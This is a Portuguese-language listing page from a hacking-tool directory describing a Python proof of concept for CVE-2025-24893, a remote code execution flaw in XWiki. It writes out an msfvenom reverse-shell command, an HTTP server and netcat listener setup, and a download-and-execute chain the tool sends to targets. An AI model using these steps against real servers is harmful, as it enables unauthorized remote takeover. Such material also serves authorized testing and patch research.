Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24893 — PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints. | Kitploit
Ferramentas/GitHubGitHub/infinit3i/cve-2025-24893
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationCommand and Control
GitHubinfinit3i/cve-2025-24893

CVE-2025-24893

PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.

Ver Repositório
61há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

XWiki CVE-2025-24893 Prova de Conceito

Autores: Net.Doge & Infinit3i


Imagem CVE-2025-24893



Twitter Follow


Este script em Python explora a CVE-2025-24893, uma vulnerabilidade de execução remota de código (RCE) no XWiki causada por sandboxing inadequado em macros Groovy renderizadas de forma assíncrona. Permite execução arbitrária de comandos através de injeção em endpoints SolrSearch baseados em RSS.

📌 Funcionalidades

  • Execução de comando único via injeção Groovy
  • Geração automática de payload reverse shell (com msfvenom)
  • Opção para personalizar:
    • Alvo remoto
    • Endereço IP local
    • Porta do servidor HTTP
    • Porta do beacon reverse shell
  • Pré-visualizações limpas de payload bash
  • TUI interativa codificada por cores ANSI

🚀 Uso

  1. Clone ou baixe o script.

  2. Certifique-se de ter os seguintes itens instalados:

    • msfvenom do Metasploit
    • Python 3
    • jq (usado nos payloads bash)
  3. Execute o script:

root@kitploit:~
python3 CVE-2025-24893-PoC.py
  1. Selecione no menu:

    • Executar Comando – Execute qualquer comando shell remotamente.
    • Reverse Shell – Gere e implante um reverse shell ELF no alvo.
    • Alterar Configurações – Modifique LHOST, RHOST, porta do servidor ou porta do beacon.

🧪 Fluxo de Trabalho do Reverse Shell

  1. O payload é gerado:
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<seu_ip> LPORT=<porta_beacon> -f elf -o rev
  1. Você receberá um prompt para iniciar um servidor HTTP Python e um listener netcat:
root@kitploit:~
python3 -m http.server 8080
nc -lvnp 31337
  1. O script envia a seguinte sequência para o alvo:

    • Baixar payload
    • Torná-lo executável
    • Executar o binário

⚠️ Aviso Legal

Esta ferramenta é apenas para fins educacionais e de teste autorizado. O uso não autorizado contra sistemas que você não possui ou sem permissão explícita para testar é ilegal e antiético.

📄 Referência

  • XWiki
  • MITRE CVE-2025-24893
Baixar ferramenta